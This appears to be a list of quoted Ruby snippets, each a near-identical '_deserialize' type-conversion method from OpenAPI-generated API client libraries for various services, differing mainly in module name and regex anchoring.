"def _deserialize(type, value)\n case type.to_sym\n when :DateTime\n DateTime.parse(value)\n when :Date\n Date.parse(value)\n when :String\n value.to_s\n when :Integer\n value.to_i\n when :Float\n value.to_f\n when :BOOLEAN\n if value.to_s =~ /\\A(true|t|yes|y|1)\\z/i\n true\n else\n false\n end\n when :Object\n # generic object (usually a Hash), return directly\n value\n when /\\AArray<(?<inner_type>.+)>\\z/\n inner_type = Regexp.last_match[:inner_type]\n value.map { |v| _deserialize(inner_type, v) }\n when /\\AHash<(?<k_type>.+?), (?<v_type>.+)>\\z/\n k_type = Regexp.last_match[:k_type]\n v_type = Regexp.last_match[:v_type]\n {}.tap do |hash|\n value.each do |k, v|\n hash[_deserialize(k_type, k)] = _deserialize(v_type, v)\n end\n end\n else # model\n temp_model = UltracartClient.const_get(type).new\n temp_model.build_from_hash(value)\n end\n end",
"def _deserialize(type, value)\n case type.to_sym\n when :DateTime\n DateTime.parse(value)\n when :Date\n Date.parse(value)\n when :String\n value.to_s\n when :Integer\n value.to_i\n when :Float\n value.to_f\n when :BOOLEAN\n if value.to_s =~ /\\A(true|t|yes|y|1)\\z/i\n true\n else\n false\n end\n when :Object\n # generic object (usually a Hash), return directly\n value\n when /\\AArray<(?<inner_type>.+)>\\z/\n inner_type = Regexp.last_match[:inner_type]\n value.map { |v| _deserialize(inner_type, v) }\n when /\\AHash<(?<k_type>.+?), (?<v_type>.+)>\\z/\n k_type = Regexp.last_match[:k_type]\n v_type = Regexp.last_match[:v_type]\n {}.tap do |hash|\n value.each do |k, v|\n hash[_deserialize(k_type, k)] = _deserialize(v_type, v)\n end\n end\n else # model\n temp_model = UltracartClient.const_get(type).new\n temp_model.build_from_hash(value)\n end\n end",
"def _deserialize(type, value)\n case type.to_sym\n when :DateTime\n DateTime.parse(value)\n when :Date\n Date.parse(value)\n when :String\n value.to_s\n when :Integer\n value.to_i\n when :Float\n value.to_f\n when :BOOLEAN\n if value.to_s =~ /\\A(true|t|yes|y|1)\\z/i\n true\n else\n false\n end\n when :Object\n # generic object (usually a Hash), return directly\n value\n when /\\AArray<(?<inner_type>.+)>\\z/\n inner_type = Regexp.last_match[:inner_type]\n value.map { |v| _deserialize(inner_type, v) }\n when /\\AHash<(?<k_type>.+?), (?<v_type>.+)>\\z/\n k_type = Regexp.last_match[:k_type]\n v_type = Regexp.last_match[:v_type]\n {}.tap do |hash|\n value.each do |k, v|\n hash[_deserialize(k_type, k)] = _deserialize(v_type, v)\n end\n end\n else # model\n temp_model = UltracartClient.const_get(type).new\n temp_model.build_from_hash(value)\n end\n end",
"def _deserialize(type, value)\n case type.to_sym\n when :DateTime\n DateTime.parse(value)\n when :Date\n Date.parse(value)\n when :String\n value.to_s\n when :Integer\n value.to_i\n when :Float\n value.to_f\n when :BOOLEAN\n if value.to_s =~ /\\A(true|t|yes|y|1)\\z/i\n true\n else\n false\n end\n when :Object\n # generic object (usually a Hash), return directly\n value\n when /\\AArray<(?<inner_type>.+)>\\z/\n inner_type = Regexp.last_match[:inner_type]\n value.map { |v| _deserialize(inner_type, v) }\n when /\\AHash<(?<k_type>.+?), (?<v_type>.+)>\\z/\n k_type = Regexp.last_match[:k_type]\n v_type = Regexp.last_match[:v_type]\n {}.tap do |hash|\n value.each do |k, v|\n hash[_deserialize(k_type, k)] = _deserialize(v_type, v)\n end\n end\n else # model\n temp_model = UltracartClient.const_get(type).new\n temp_model.build_from_hash(value)\n end\n end",
"def _deserialize(type, value)\n case type.to_sym\n when :DateTime\n DateTime.parse(value)\n when :Date\n Date.parse(value)\n when :String\n value.to_s\n when :Integer\n value.to_i\n when :Float\n value.to_f\n when :Boolean\n if value.to_s =~ /\\A(true|t|yes|y|1)\\z/i\n true\n else\n false\n end\n when :Object\n # generic object (usually a Hash), return directly\n value\n when /\\AArray<(?<inner_type>.+)>\\z/\n inner_type = Regexp.last_match[:inner_type]\n value.map { |v| _deserialize(inner_type, v) }\n when /\\AHash<(?<k_type>.+?), (?<v_type>.+)>\\z/\n k_type = Regexp.last_match[:k_type]\n v_type = Regexp.last_match[:v_type]\n {}.tap do |hash|\n value.each do |k, v|\n hash[_deserialize(k_type, k)] = _deserialize(v_type, v)\n end\n end\n else # model\n DearInventoryRuby.const_get(type).build_from_hash(value)\n end\n end",
"def _deserialize(type, value)\n case type.to_sym\n when :DateTime\n DateTime.parse(value)\n when :Date\n Date.parse(value)\n when :String\n value.to_s\n when :Integer\n value.to_i\n when :Float\n value.to_f\n when :BOOLEAN\n if value.to_s =~ /\\A(true|t|yes|y|1)\\z/i\n true\n else\n false\n end\n when :Object\n # generic object (usually a Hash), return directly\n value\n when /\\AArray<(?<inner_type>.+)>\\z/\n inner_type = Regexp.last_match[:inner_type]\n value.map { |v| _deserialize(inner_type, v) }\n when /\\AHash<(?<k_type>.+?), (?<v_type>.+)>\\z/\n k_type = Regexp.last_match[:k_type]\n v_type = Regexp.last_match[:v_type]\n {}.tap do |hash|\n value.each do |k, v|\n hash[_deserialize(k_type, k)] = _deserialize(v_type, v)\n end\n end\n else # model\n temp_model = Mooncard.const_get(type).new\n temp_model.build_from_hash(value)\n end\n end",
"def _deserialize(type, value)\n case type.to_sym\n when :DateTime\n DateTime.parse(value)\n when :Date\n Date.parse(value)\n when :String\n value.to_s\n when :Integer\n value.to_i\n when :Float\n value.to_f\n when :BOOLEAN\n if value.to_s =~ /\\A(true|t|yes|y|1)\\z/i\n true\n else\n false\n end\n when :Object\n # generic object (usually a Hash), return directly\n value\n when /\\AArray<(?<inner_type>.+)>\\z/\n inner_type = Regexp.last_match[:inner_type]\n value.map { |v| _deserialize(inner_type, v) }\n when /\\AHash<(?<k_type>.+?), (?<v_type>.+)>\\z/\n k_type = Regexp.last_match[:k_type]\n v_type = Regexp.last_match[:v_type]\n {}.tap do |hash|\n value.each do |k, v|\n hash[_deserialize(k_type, k)] = _deserialize(v_type, v)\n end\n end\n else # model\n temp_model = Aimastering.const_get(type).new\n temp_model.build_from_hash(value)\n end\n end",
"def _deserialize(type, value)\n case type.to_sym\n when :DateTime\n DateTime.parse(value)\n when :Date\n Date.parse(value)\n when :String\n value.to_s\n when :Integer\n value.to_i\n when :Float\n value.to_f\n when :BOOLEAN\n if value.to_s =~ /\\A(true|t|yes|y|1)\\z/i\n true\n else\n false\n end\n when :Object\n # generic object (usually a Hash), return directly\n value\n when /\\AArray<(?<inner_type>.+)>\\z/\n inner_type = Regexp.last_match[:inner_type]\n value.map { |v| _deserialize(inner_type, v) }\n when /\\AHash<(?<k_type>.+?), (?<v_type>.+)>\\z/\n k_type = Regexp.last_match[:k_type]\n v_type = Regexp.last_match[:v_type]\n {}.tap do |hash|\n value.each do |k, v|\n hash[_deserialize(k_type, k)] = _deserialize(v_type, v)\n end\n end\n else # model\n temp_model = Harbor1Client.const_get(type).new\n temp_model.build_from_hash(value)\n end\n end",
"def _deserialize(type, value)\n case type.to_sym\n when :DateTime\n DateTime.parse(value)\n when :Date\n Date.parse(value)\n when :String\n value.to_s\n when :Integer\n value.to_i\n when :Float\n value.to_f\n when :BOOLEAN\n if value.to_s =~ /\\A(true|t|yes|y|1)\\z/i\n true\n else\n false\n end\n when :Object\n # generic object (usually a Hash), return directly\n value\n when /\\AArray<(?<inner_type>.+)>\\z/\n inner_type = Regexp.last_match[:inner_type]\n value.map { |v| _deserialize(inner_type, v) }\n when /\\AHash<(?<k_type>.+?), (?<v_type>.+)>\\z/\n k_type = Regexp.last_match[:k_type]\n v_type = Regexp.last_match[:v_type]\n {}.tap do |hash|\n value.each do |k, v|\n hash[_deserialize(k_type, k)] = _deserialize(v_type, v)\n end\n end\n else # model\n temp_model = Intrinio.const_get(type).new\n temp_model.build_from_hash(value)\n end\n end",
"def _deserialize(type, value)\n case type.to_sym\n when :DateTime\n DateTime.parse(value)\n when :Date\n Date.parse(value)\n when :String\n value.to_s\n when :Integer\n value.to_i\n when :Float\n value.to_f\n when :BOOLEAN\n if value.to_s =~ /\\A(true|t|yes|y|1)\\z/i\n true\n else\n false\n end\n when :Object\n # generic object (usually a Hash), return directly\n value\n when /\\AArray<(?<inner_type>.+)>\\z/\n inner_type = Regexp.last_match[:inner_type]\n value.map { |v| _deserialize(inner_type, v) }\n when /\\AHash<(?<k_type>.+?), (?<v_type>.+)>\\z/\n k_type = Regexp.last_match[:k_type]\n v_type = Regexp.last_match[:v_type]\n {}.tap do |hash|\n value.each do |k, v|\n hash[_deserialize(k_type, k)] = _deserialize(v_type, v)\n end\n end\n else # model\n temp_model = Intrinio.const_get(type).new\n temp_model.build_from_hash(value)\n end\n end",
"def _deserialize(type, value)\n case type.to_sym\n when :DateTime\n DateTime.parse(value)\n when :Date\n Date.parse(value)\n when :String\n value.to_s\n when :Integer\n value.to_i\n when :Float\n value.to_f\n when :BOOLEAN\n if value.to_s =~ /\\A(true|t|yes|y|1)\\z/i\n true\n else\n false\n end\n when :Object\n # generic object (usually a Hash), return directly\n value\n when /\\AArray<(?<inner_type>.+)>\\z/\n inner_type = Regexp.last_match[:inner_type]\n value.map { |v| _deserialize(inner_type, v) }\n when /\\AHash<(?<k_type>.+?), (?<v_type>.+)>\\z/\n k_type = Regexp.last_match[:k_type]\n v_type = Regexp.last_match[:v_type]\n {}.tap do |hash|\n value.each do |k, v|\n hash[_deserialize(k_type, k)] = _deserialize(v_type, v)\n end\n end\n else # model\n temp_model = Intrinio.const_get(type).new\n temp_model.build_from_hash(value)\n end\n end",
"def _deserialize(type, value)\n case type.to_sym\n when :DateTime\n DateTime.parse(value)\n when :Date\n Date.parse(value)\n when :String\n value.to_s\n when :Integer\n value.to_i\n when :Float\n value.to_f\n when :BOOLEAN\n if value.to_s =~ /\\A(true|t|yes|y|1)\\z/i\n true\n else\n false\n end\n when :Object\n # generic object (usually a Hash), return directly\n value\n when /\\AArray<(?<inner_type>.+)>\\z/\n inner_type = Regexp.last_match[:inner_type]\n value.map { |v| _deserialize(inner_type, v) }\n when /\\AHash<(?<k_type>.+?), (?<v_type>.+)>\\z/\n k_type = Regexp.last_match[:k_type]\n v_type = Regexp.last_match[:v_type]\n {}.tap do |hash|\n value.each do |k, v|\n hash[_deserialize(k_type, k)] = _deserialize(v_type, v)\n end\n end\n else # model\n temp_model = Intrinio.const_get(type).new\n temp_model.build_from_hash(value)\n end\n end",
"def _deserialize(type, value)\n case type.to_sym\n when :DateTime\n DateTime.parse(value)\n when :Date\n Date.parse(value)\n when :String\n value.to_s\n when :Integer\n value.to_i\n when :Float\n value.to_f\n when :BOOLEAN\n if value.to_s =~ /\\A(true|t|yes|y|1)\\z/i\n true\n else\n false\n end\n when :Object\n # generic object (usually a Hash), return directly\n value\n when /\\AArray<(?<inner_type>.+)>\\z/\n inner_type = Regexp.last_match[:inner_type]\n value.map { |v| _deserialize(inner_type, v) }\n when /\\AHash<(?<k_type>.+?), (?<v_type>.+)>\\z/\n k_type = Regexp.last_match[:k_type]\n v_type = Regexp.last_match[:v_type]\n {}.tap do |hash|\n value.each do |k, v|\n hash[_deserialize(k_type, k)] = _deserialize(v_type, v)\n end\n end\n else # model\n temp_model = Intrinio.const_get(type).new\n temp_model.build_from_hash(value)\n end\n end",
"def _deserialize(type, value)\n case type.to_sym\n when :DateTime\n DateTime.parse(value)\n when :Date\n Date.parse(value)\n when :String\n value.to_s\n when :Integer\n value.to_i\n when :Float\n value.to_f\n when :BOOLEAN\n if value.to_s =~ /\\A(true|t|yes|y|1)\\z/i\n true\n else\n false\n end\n when :Object\n # generic object (usually a Hash), return directly\n value\n when /\\AArray<(?<inner_type>.+)>\\z/\n inner_type = Regexp.last_match[:inner_type]\n value.map { |v| _deserialize(inner_type, v) }\n when /\\AHash<(?<k_type>.+?), (?<v_type>.+)>\\z/\n k_type = Regexp.last_match[:k_type]\n v_type = Regexp.last_match[:v_type]\n {}.tap do |hash|\n value.each do |k, v|\n hash[_deserialize(k_type, k)] = _deserialize(v_type, v)\n end\n end\n else # model\n temp_model = Intrinio.const_get(type).new\n temp_model.build_from_hash(value)\n end\n end",
"def _deserialize(type, value)\n case type.to_sym\n when :DateTime\n DateTime.parse(value)\n when :Date\n Date.parse(value)\n when :String\n value.to_s\n when :Integer\n value.to_i\n when :Float\n value.to_f\n when :BOOLEAN\n if value.to_s =~ /\\A(true|t|yes|y|1)\\z/i\n true\n else\n false\n end\n when :Object\n # generic object (usually a Hash), return directly\n value\n when /\\AArray<(?<inner_type>.+)>\\z/\n inner_type = Regexp.last_match[:inner_type]\n value.map { |v| _deserialize(inner_type, v) }\n when /\\AHash<(?<k_type>.+?), (?<v_type>.+)>\\z/\n k_type = Regexp.last_match[:k_type]\n v_type = Regexp.last_match[:v_type]\n {}.tap do |hash|\n value.each do |k, v|\n hash[_deserialize(k_type, k)] = _deserialize(v_type, v)\n end\n end\n else # model\n temp_model = Intrinio.const_get(type).new\n temp_model.build_from_hash(value)\n end\n end",
"def _deserialize(type, value)\n case type.to_sym\n when :DateTime\n DateTime.parse(value)\n when :Date\n Date.parse(value)\n when :String\n value.to_s\n when :Integer\n value.to_i\n when :Float\n value.to_f\n when :BOOLEAN\n if value.to_s =~ /^(true|t|yes|y|1)$/i\n true\n else\n false\n end\n when :Object\n # generic object (usually a Hash), return directly\n value\n when /\\AArray<(?<inner_type>.+)>\\z/\n inner_type = Regexp.last_match[:inner_type]\n value.map { |v| _deserialize(inner_type, v) }\n when /\\AHash<(?<k_type>.+), (?<v_type>.+)>\\z/\n k_type = Regexp.last_match[:k_type]\n v_type = Regexp.last_match[:v_type]\n {}.tap do |hash|\n value.each do |k, v|\n hash[_deserialize(k_type, k)] = _deserialize(v_type, v)\n end\n end\n else # model\n temp_model = Pier.const_get(type).new\n temp_model.build_from_hash(value)\n end\n end",
"def _deserialize(type, value)\n case type.to_sym\n when :DateTime\n DateTime.parse(value)\n when :Date\n Date.parse(value)\n when :String\n value.to_s\n when :Integer\n value.to_i\n when :Float\n value.to_f\n when :BOOLEAN\n if value.to_s =~ /^(true|t|yes|y|1)$/i\n true\n else\n false\n end\n when :Object\n # generic object (usually a Hash), return directly\n value\n when /\\AArray<(?<inner_type>.+)>\\z/\n inner_type = Regexp.last_match[:inner_type]\n value.map { |v| _deserialize(inner_type, v) }\n when /\\AHash<(?<k_type>.+), (?<v_type>.+)>\\z/\n k_type = Regexp.last_match[:k_type]\n v_type = Regexp.last_match[:v_type]\n {}.tap do |hash|\n value.each do |k, v|\n hash[_deserialize(k_type, k)] = _deserialize(v_type, v)\n end\n end\n else # model\n temp_model = Pier.const_get(type).new\n temp_model.build_from_hash(value)\n end\n end",
"def _deserialize(type, value)\n case type.to_sym\n when :DateTime\n DateTime.parse(value)\n when :Date\n Date.parse(value)\n when :String\n value.to_s\n when :Integer\n value.to_i\n when :Float\n value.to_f\n when :BOOLEAN\n if value.to_s =~ /^(true|t|yes|y|1)$/i\n true\n else\n false\n end\n when :Object\n # generic object (usually a Hash), return directly\n value\n when /\\AArray<(?<inner_type>.+)>\\z/\n inner_type = Regexp.last_match[:inner_type]\n value.map { |v| _deserialize(inner_type, v) }\n when /\\AHash<(?<k_type>.+), (?<v_type>.+)>\\z/\n k_type = Regexp.last_match[:k_type]\n v_type = Regexp.last_match[:v_type]\n {}.tap do |hash|\n value.each do |k, v|\n hash[_deserialize(k_type, k)] = _deserialize(v_type, v)\n end\n end\n else # model\n temp_model = Pier.const_get(type).new\n temp_model.build_from_hash(value)\n end\n end",
"def _deserialize(type, value)\n case type.to_sym\n when :DateTime\n DateTime.parse(value)\n when :Date\n Date.parse(value)\n when :String\n value.to_s\n when :Integer\n value.to_i\n when :Float\n value.to_f\n when :BOOLEAN\n if value.to_s =~ /^(true|t|yes|y|1)$/i\n true\n else\n false\n end\n when :Object\n # generic object (usually a Hash), return directly\n value\n when /\\AArray<(?<inner_type>.+)>\\z/\n inner_type = Regexp.last_match[:inner_type]\n value.map { |v| _deserialize(inner_type, v) }\n when /\\AHash<(?<k_type>.+), (?<v_type>.+)>\\z/\n k_type = Regexp.last_match[:k_type]\n v_type = Regexp.last_match[:v_type]\n {}.tap do |hash|\n value.each do |k, v|\n hash[_deserialize(k_type, k)] = _deserialize(v_type, v)\n end\n end\n else # model\n temp_model = Pier.const_get(type).new\n temp_model.build_from_hash(value)\n end\n end",
"def _deserialize(type, value)\n case type.to_sym\n when :DateTime\n DateTime.parse(value)\n when :Date\n Date.parse(value)\n when :String\n value.to_s\n when :Integer\n value.to_i\n when :Float\n value.to_f\n when :BOOLEAN\n if value.to_s =~ /^(true|t|yes|y|1)$/i\n true\n else\n false\n end\n when :Object\n # generic object (usually a Hash), return directly\n value\n when /\\AArray<(?<inner_type>.+)>\\z/\n inner_type = Regexp.last_match[:inner_type]\n value.map { |v| _deserialize(inner_type, v) }\n when /\\AHash<(?<k_type>.+), (?<v_type>.+)>\\z/\n k_type = Regexp.last_match[:k_type]\n v_type = Regexp.last_match[:v_type]\n {}.tap do |hash|\n value.each do |k, v|\n hash[_deserialize(k_type, k)] = _deserialize(v_type, v)\n end\n end\n else # model\n temp_model = Pier.const_get(type).new\n temp_model.build_from_hash(value)\n end\n end",
"def _deserialize(type, value)\n case type.to_sym\n when :DateTime\n DateTime.parse(value)\n when :Date\n Date.parse(value)\n when :String\n value.to_s\n when :Integer\n value.to_i\n when :Float\n value.to_f\n when :BOOLEAN\n if value.to_s =~ /^(true|t|yes|y|1)$/i\n true\n else\n false\n end\n when :Object\n # generic object (usually a Hash), return directly\n value\n when /\\AArray<(?<inner_type>.+)>\\z/\n inner_type = Regexp.last_match[:inner_type]\n value.map { |v| _deserialize(inner_type, v) }\n when /\\AHash<(?<k_type>.+), (?<v_type>.+)>\\z/\n k_type = Regexp.last_match[:k_type]\n v_type = Regexp.last_match[:v_type]\n {}.tap do |hash|\n value.each do |k, v|\n hash[_deserialize(k_type, k)] = _deserialize(v_type, v)\n end\n end\n else # model\n temp_model = Pier.const_get(type).new\n temp_model.build_from_hash(value)\n end\n end",
"def _deserialize(type, value)\n case type.to_sym\n when :DateTime\n DateTime.parse(value)\n when :Date\n Date.parse(value)\n when :String\n value.to_s\n when :Integer\n value.to_i\n when :Float\n value.to_f\n when :BOOLEAN\n if value.to_s =~ /^(true|t|yes|y|1)$/i\n true\n else\n false\n end\n when :Object\n # generic object (usually a Hash), return directly\n value\n when /\\AArray<(?<inner_type>.+)>\\z/\n inner_type = Regexp.last_match[:inner_type]\n value.map { |v| _deserialize(inner_type, v) }\n when /\\AHash<(?<k_type>.+), (?<v_type>.+)>\\z/\n k_type = Regexp.last_match[:k_type]\n v_type = Regexp.last_match[:v_type]\n {}.tap do |hash|\n value.each do |k, v|\n hash[_deserialize(k_type, k)] = _deserialize(v_type, v)\n end\n end\n else # model\n temp_model = Pier.const_get(type).new\n temp_model.build_from_hash(value)\n end\n end",
"def _deserialize(type, value)\n case type.to_sym\n when :DateTime\n DateTime.parse(value)\n when :Date\n Date.parse(value)\n when :String\n value.to_s\n when :Integer\n value.to_i\n when :Float\n value.to_f\n when :BOOLEAN\n if value.to_s =~ /^(true|t|yes|y|1)$/i\n true\n else\n false\n end\n when :Object\n # generic object (usually a Hash), return directly\n value\n when /\\AArray<(?<inner_type>.+)>\\z/\n inner_type = Regexp.last_match[:inner_type]\n value.map { |v| _deserialize(inner_type, v) }\n when /\\AHash<(?<k_type>.+), (?<v_type>.+)>\\z/\n k_type = Regexp.last_match[:k_type]\n v_type = Regexp.last_match[:v_type]\n {}.tap do |hash|\n value.each do |k, v|\n hash[_deserialize(k_type, k)] = _deserialize(v_type, v)\n end\n end\n else # model\n temp_model = Pier.const_get(type).new\n temp_model.build_from_hash(value)\n end\n end",
"def _deserialize(type, value)\n case type.to_sym\n when :DateTime\n DateTime.parse(value)\n when :Date\n Date.parse(value)\n when :String\n value.to_s\n when :Integer\n value.to_i\n when :Float\n value.to_f\n when :BOOLEAN\n if value.to_s =~ /^(true|t|yes|y|1)$/i\n true\n else\n false\n end\n when :Object\n # generic object (usually a Hash), return directly\n value\n when /\\AArray<(?<inner_type>.+)>\\z/\n inner_type = Regexp.last_match[:inner_type]\n value.map { |v| _deserialize(inner_type, v) }\n when /\\AHash<(?<k_type>.+), (?<v_type>.+)>\\z/\n k_type = Regexp.last_match[:k_type]\n v_type = Regexp.last_match[:v_type]\n {}.tap do |hash|\n value.each do |k, v|\n hash[_deserialize(k_type, k)] = _deserialize(v_type, v)\n end\n end\n else # model\n temp_model = Pier.const_get(type).new\n temp_model.build_from_hash(value)\n end\n end",
"def _deserialize(type, value)\n case type.to_sym\n when :DateTime\n DateTime.parse(value)\n when :Date\n Date.parse(value)\n when :String\n value.to_s\n when :Integer\n value.to_i\n when :Float\n value.to_f\n when :BOOLEAN\n if value.to_s =~ /^(true|t|yes|y|1)$/i\n true\n else\n false\n end\n when :Object\n # generic object (usually a Hash), return directly\n value\n when /\\AArray<(?<inner_type>.+)>\\z/\n inner_type = Regexp.last_match[:inner_type]\n value.map { |v| _deserialize(inner_type, v) }\n when /\\AHash<(?<k_type>.+), (?<v_type>.+)>\\z/\n k_type = Regexp.last_match[:k_type]\n v_type = Regexp.last_match[:v_type]\n {}.tap do |hash|\n value.each do |k, v|\n hash[_deserialize(k_type, k)] = _deserialize(v_type, v)\n end\n end\n else # model\n temp_model = Pier.const_get(type).new\n temp_model.build_from_hash(value)\n end\n end",
"def _deserialize(type, value)\n case type.to_sym\n when :DateTime\n DateTime.parse(value)\n when :Date\n Date.parse(value)\n when :String\n value.to_s\n when :Integer\n value.to_i\n when :Float\n value.to_f\n when :BOOLEAN\n if value.to_s =~ /\\A(true|t|yes|y|1)\\z/i\n true\n else\n false\n end\n when :Object\n # generic object (usually a Hash), return directly\n value\n when /\\AArray<(?<inner_type>.+)>\\z/\n inner_type = Regexp.last_match[:inner_type]\n value.map { |v| _deserialize(inner_type, v) }\n when /\\AHash<(?<k_type>.+?), (?<v_type>.+)>\\z/\n k_type = Regexp.last_match[:k_type]\n v_type = Regexp.last_match[:v_type]\n {}.tap do |hash|\n value.each do |k, v|\n hash[_deserialize(k_type, k)] = _deserialize(v_type, v)\n end\n end\n else # model\n temp_model = CrelateClient.const_get(type).new\n temp_model.build_from_hash(value)\n end\n end",
"def _deserialize(type, value)\n case type.to_sym\n when :DateTime\n DateTime.parse(value)\n when :Date\n Date.parse(value)\n when :String\n value.to_s\n when :Integer\n value.to_i\n when :Float\n value.to_f\n when :BOOLEAN\n if value.to_s =~ /\\A(true|t|yes|y|1)\\z/i\n true\n else\n false\n end\n when :Object\n # generic object (usually a Hash), return directly\n value\n when /\\AArray<(?<inner_type>.+)>\\z/\n inner_type = Regexp.last_match[:inner_type]\n value.map { |v| _deserialize(inner_type, v) }\n when /\\AHash<(?<k_type>.+?), (?<v_type>.+)>\\z/\n k_type = Regexp.last_match[:k_type]\n v_type = Regexp.last_match[:v_type]\n {}.tap do |hash|\n value.each do |k, v|\n hash[_deserialize(k_type, k)] = _deserialize(v_type, v)\n end\n end\n else # model\n temp_model = CrelateClient.const_get(type).new\n temp_model.build_from_hash(value)\n end\n end",
"def _deserialize(type, value)\n case type.to_sym\n when :DateTime\n DateTime.parse(value)\n when :Date\n Date.parse(value)\n when :String\n value.to_s\n when :Integer\n value.to_i\n when :Float\n value.to_f\n when :BOOLEAN\n if value.to_s =~ /\\A(true|t|yes|y|1)\\z/i\n true\n else\n false\n end\n when :Object\n # generic object (usually a Hash), return directly\n value\n when /\\AArray<(?<inner_type>.+)>\\z/\n inner_type = Regexp.last_match[:inner_type]\n value.map { |v| _deserialize(inner_type, v) }\n when /\\AHash<(?<k_type>.+?), (?<v_type>.+)>\\z/\n k_type = Regexp.last_match[:k_type]\n v_type = Regexp.last_match[:v_type]\n {}.tap do |hash|\n value.each do |k, v|\n hash[_deserialize(k_type, k)] = _deserialize(v_type, v)\n end\n end\n else # model\n temp_model = CrelateClient.const_get(type).new\n temp_model.build_from_hash(value)\n end\n end",
"def _deserialize(type, value)\n case type.to_sym\n when :DateTime\n DateTime.parse(value)\n when :Date\n Date.parse(value)\n when :String\n value.to_s\n when :Integer\n value.to_i\n when :Float\n value.to_f\n when :BOOLEAN\n if value.to_s =~ /\\A(true|t|yes|y|1)\\z/i\n true\n else\n false\n end\n when :Object\n # generic object (usually a Hash), return directly\n value\n when /\\AArray<(?<inner_type>.+)>\\z/\n inner_type = Regexp.last_match[:inner_type]\n value.map { |v| _deserialize(inner_type, v) }\n when /\\AHash<(?<k_type>.+?), (?<v_type>.+)>\\z/\n k_type = Regexp.last_match[:k_type]\n v_type = Regexp.last_match[:v_type]\n {}.tap do |hash|\n value.each do |k, v|\n hash[_deserialize(k_type, k)] = _deserialize(v_type, v)\n end\n end\n else # model\n temp_model = CrelateClient.const_get(type).new\n temp_model.build_from_hash(value)\n end\n end",
"def _deserialize(type, value)\n case type.to_sym\n when :DateTime\n DateTime.parse(value)\n when :Date\n Date.parse(value)\n when :String\n value.to_s\n when :Integer\n value.to_i\n when :Float\n value.to_f\n when :BOOLEAN\n if value.to_s =~ /\\A(true|t|yes|y|1)\\z/i\n true\n else\n false\n end\n when :Object\n # generic object (usually a Hash), return directly\n value\n when /\\AArray<(?<inner_type>.+)>\\z/\n inner_type = Regexp.last_match[:inner_type]\n value.map { |v| _deserialize(inner_type, v) }\n when /\\AHash<(?<k_type>.+?), (?<v_type>.+)>\\z/\n k_type = Regexp.last_match[:k_type]\n v_type = Regexp.last_match[:v_type]\n {}.tap do |hash|\n value.each do |k, v|\n hash[_deserialize(k_type, k)] = _deserialize(v_type, v)\n end\n end\n else # model\n temp_model = CrelateClient.const_get(type).new\n temp_model.build_from_hash(value)\n end\n end",
"def _deserialize(type, value)\n case type.to_sym\n when :DateTime\n DateTime.parse(value)\n when :Date\n Date.parse(value)\n when :String\n value.to_s\n when :Integer\n value.to_i\n when :Float\n value.to_f\n when :BOOLEAN\n if value.to_s =~ /\\A(true|t|yes|y|1)\\z/i\n true\n else\n false\n end\n when :Object\n # generic object (usually a Hash), return directly\n value\n when /\\AArray<(?<inner_type>.+)>\\z/\n inner_type = Regexp.last_match[:inner_type]\n value.map { |v| _deserialize(inner_type, v) }\n when /\\AHash<(?<k_type>.+?), (?<v_type>.+)>\\z/\n k_type = Regexp.last_match[:k_type]\n v_type = Regexp.last_match[:v_type]\n {}.tap do |hash|\n value.each do |k, v|\n hash[_deserialize(k_type, k)] = _deserialize(v_type, v)\n end\n end\n else # model\n temp_model = WellsFargoAchClient.const_get(type).new\n temp_model.build_from_hash(value)\n end\n end",
"def _deserialize(type, value)\n case type.to_sym\n when :DateTime\n DateTime.parse(value)\n when :Date\n Date.parse(value)\n when :String\n value.to_s\n when :Integer\n value.to_i\n when :Float\n value.to_f\n when :BOOLEAN\n if value.to_s =~ /\\A(true|t|yes|y|1)\\z/i\n true\n else\n false\n end\n when :Object\n # generic object (usually a Hash), return directly\n value\n when /\\AArray<(?<inner_type>.+)>\\z/\n inner_type = Regexp.last_match[:inner_type]\n value.map { |v| _deserialize(inner_type, v) }\n when /\\AHash<(?<k_type>.+?), (?<v_type>.+)>\\z/\n k_type = Regexp.last_match[:k_type]\n v_type = Regexp.last_match[:v_type]\n {}.tap do |hash|\n value.each do |k, v|\n hash[_deserialize(k_type, k)] = _deserialize(v_type, v)\n end\n end\n else # model\n temp_model = ArtikCloud.const_get(type).new\n temp_model.build_from_hash(value)\n end\n end",
"def _deserialize(type, value)\n case type.to_sym\n when :DateTime\n DateTime.parse(value)\n when :Date\n Date.parse(value)\n when :String\n value.to_s\n when :Integer\n value.to_i\n when :Float\n value.to_f\n when :BOOLEAN\n if value.to_s =~ /\\A(true|t|yes|y|1)\\z/i\n true\n else\n false\n end\n when :Object\n # generic object (usually a Hash), return directly\n value\n when /\\AArray<(?<inner_type>.+)>\\z/\n inner_type = Regexp.last_match[:inner_type]\n value.map { |v| _deserialize(inner_type, v) }\n when /\\AHash<(?<k_type>.+?), (?<v_type>.+)>\\z/\n k_type = Regexp.last_match[:k_type]\n v_type = Regexp.last_match[:v_type]\n {}.tap do |hash|\n value.each do |k, v|\n hash[_deserialize(k_type, k)] = _deserialize(v_type, v)\n end\n end\n else # model\n temp_model = Dkron.const_get(type).new\n temp_model.build_from_hash(value)\n end\n end",
"def _deserialize(type, value)\n case type.to_sym\n when :DateTime\n DateTime.parse(value)\n when :Date\n Date.parse(value)\n when :String\n value.to_s\n when :Integer\n value.to_i\n when :Float\n value.to_f\n when :Boolean\n if value.to_s =~ /\\A(true|t|yes|y|1)\\z/i\n true\n else\n false\n end\n when :Object\n # generic object (usually a Hash), return directly\n value\n when /\\AArray<(?<inner_type>.+)>\\z/\n inner_type = Regexp.last_match[:inner_type]\n value.map { |v| _deserialize(inner_type, v) }\n when /\\AHash<(?<k_type>.+?), (?<v_type>.+)>\\z/\n k_type = Regexp.last_match[:k_type]\n v_type = Regexp.last_match[:v_type]\n {}.tap do |hash|\n value.each do |k, v|\n hash[_deserialize(k_type, k)] = _deserialize(v_type, v)\n end\n end\n else # model\n MailSlurpClient.const_get(type).build_from_hash(value)\n end\n end",
